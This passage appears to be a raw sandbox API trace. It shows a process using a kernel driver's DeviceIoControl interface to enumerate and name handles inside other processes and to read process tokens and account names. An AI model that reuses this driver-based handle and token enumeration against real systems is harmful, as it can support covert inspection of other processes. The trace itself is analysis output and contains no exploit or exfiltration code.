ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.348] ObfDereferenceObject (Object=0xfffffa8001e99070) returned 0x1 [0161.348] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.348] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.348] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.348] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.348] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.348] PsAcquireProcessExitSynchronization () returned 0x0 [0161.348] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.348] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00109f320, HandleInformation=0x0) returned 0x0 [0161.348] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.348] PsReleaseProcessExitSynchronization () returned 0x2 [0161.348] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.348] ObQueryNameString (in: Object=0xfffff8a00109f320, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.348] ObfDereferenceObject (Object=0xfffff8a00109f320) returned 0x1 [0161.348] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.648] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.648] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0161.648] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.648] PsAcquireProcessExitSynchronization () returned 0x0 [0161.648] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.648] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a23250, HandleInformation=0x0) returned 0x0 [0161.648] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.648] PsReleaseProcessExitSynchronization () returned 0x2 [0161.648] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.648] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d25c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d25c4, ReturnLength=0xfffff88005163508) returned 0x0 [0161.648] ObfDereferenceObject (Object=0xfffffa8003a23250) returned 0x1 [0161.649] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.649] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.649] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0161.649] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.649] PsAcquireProcessExitSynchronization () returned 0x0 [0161.649] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.649] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002814f20, HandleInformation=0x0) returned 0x0 [0161.649] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.649] PsReleaseProcessExitSynchronization () returned 0x2 [0161.649] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.649] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80022c2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c2044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.649] ObfDereferenceObject (Object=0xfffffa8002814f20) returned 0x1 [0161.649] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.649] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.649] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.649] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.650] PsAcquireProcessExitSynchronization () returned 0x0 [0161.650] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.650] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.650] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.650] PsReleaseProcessExitSynchronization () returned 0x2 [0161.650] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.650] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80022c3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c3044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.650] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.650] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.650] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.650] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.650] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0161.650] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.650] PsAcquireProcessExitSynchronization () returned 0x0 [0161.650] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.651] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80019db970, HandleInformation=0x0) returned 0x0 [0161.651] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.651] PsReleaseProcessExitSynchronization () returned 0x2 [0161.651] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.651] ObQueryNameString (in: Object=0xfffffa80019db970, ObjectNameInfo=0xfffffa80022c4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c4044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.651] ObfDereferenceObject (Object=0xfffffa80019db970) returned 0x1 [0161.651] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.651] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.651] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.651] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.651] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.651] PsAcquireProcessExitSynchronization () returned 0x0 [0161.651] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.651] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.651] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.652] PsReleaseProcessExitSynchronization () returned 0x2 [0161.652] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.652] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80022c5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c5044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.652] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.652] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.652] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.652] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.652] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.652] PsAcquireProcessExitSynchronization () returned 0x0 [0161.652] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.652] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0161.652] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.652] PsReleaseProcessExitSynchronization () returned 0x2 [0161.652] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.652] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80022c6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c6044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.652] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0161.652] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.652] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xc8 [0161.653] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.653] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001e9eb30, HandleInformation=0x0) returned 0x0 [0161.653] ObOpenObjectByPointer (in: Object=0xfffffa8001e9eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.653] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3f [0161.653] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0161.653] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.653] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.653] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.653] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.657] CloseHandle (hObject=0xc4) returned 1 [0161.657] CloseHandle (hObject=0xc8) returned 1 [0161.657] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.657] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0161.657] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.657] PsAcquireProcessExitSynchronization () returned 0x0 [0161.657] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0) [0161.657] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002167f20, HandleInformation=0x0) returned 0x0 [0161.657] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.657] PsReleaseProcessExitSynchronization () returned 0x2 [0161.658] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3d [0161.658] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c7044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.658] ObfDereferenceObject (Object=0xfffffa8002167f20) returned 0x1 [0161.658] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.658] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.658] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.658] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.658] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.658] PsAcquireProcessExitSynchronization () returned 0x0 [0161.658] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0) [0161.658] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80027e1f20, HandleInformation=0x0) returned 0x0 [0161.658] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.658] PsReleaseProcessExitSynchronization () returned 0x2 [0161.659] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3d [0161.659] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.659] ObfDereferenceObject (Object=0xfffffa80027e1f20) returned 0x1 [0161.659] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.659] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.659] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.659] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0161.659] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.659] PsAcquireProcessExitSynchronization () returned 0x0 [0161.659] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880051635d0) [0161.659] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8d9e0, HandleInformation=0x0) returned 0x0 [0161.660] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.660] PsReleaseProcessExitSynchronization () returned 0x2 [0161.660] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3d [0161.660] ObQueryNameString (in: Object=0xfffffa8001e8d9e0, ObjectNameInfo=0xfffffa80022c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.660] ObfDereferenceObject (Object=0xfffffa8001e8d9e0) returned 0x1 [0161.660] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.660] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x730) returned 0xc8 [0161.660] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.660] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80021a89d0, HandleInformation=0x0) returned 0x0 [0161.661] ObOpenObjectByPointer (in: Object=0xfffffa80021a89d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.661] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x20 [0161.661] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0161.661] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.661] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.661] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.662] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.664] CloseHandle (hObject=0xc4) returned 1 [0161.664] CloseHandle (hObject=0xc8) returned 1 [0161.664] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.664] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0161.664] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.664] PsAcquireProcessExitSynchronization () returned 0x0 [0161.664] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.664] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ee2c70, HandleInformation=0x0) returned 0x0 [0161.665] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.665] PsReleaseProcessExitSynchronization () returned 0x2 [0161.665] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.665] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ca044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ca044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.665] ObfDereferenceObject (Object=0xfffffa8001ee2c70) returned 0x1 [0161.665] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.665] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.665] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.665] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0161.665] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.665] PsAcquireProcessExitSynchronization () returned 0x0 [0161.665] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.665] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002160c00, HandleInformation=0x0) returned 0x0 [0161.665] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.665] PsReleaseProcessExitSynchronization () returned 0x2 [0161.666] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.666] ObQueryNameString (in: Object=0xfffffa8002160c00, ObjectNameInfo=0xfffffa80022cb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022cb044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.666] ObfDereferenceObject (Object=0xfffffa8002160c00) returned 0x1 [0161.666] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.666] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.666] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.666] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.666] PsAcquireProcessExitSynchronization () returned 0x0 [0161.666] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.666] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0161.666] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.666] PsReleaseProcessExitSynchronization () 